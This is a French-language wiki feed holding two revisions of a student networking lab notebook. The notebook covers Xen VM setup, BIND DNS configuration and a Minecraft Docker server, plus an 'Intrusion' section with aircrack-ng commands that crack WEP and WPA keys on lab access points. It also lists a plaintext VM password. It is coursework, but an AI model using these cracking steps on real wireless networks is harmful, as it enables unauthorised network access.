<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Hguyard</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Hguyard"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Hguyard"/>
		<updated>2026-05-14T12:04:04Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:WPA_crack.png&amp;diff=60166</id>
		<title>Fichier:WPA crack.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:WPA_crack.png&amp;diff=60166"/>
				<updated>2022-11-28T16:30:20Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60165</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60165"/>
				<updated>2022-11-28T16:29:43Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60125</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60125"/>
				<updated>2022-11-28T12:57:00Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* WPA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
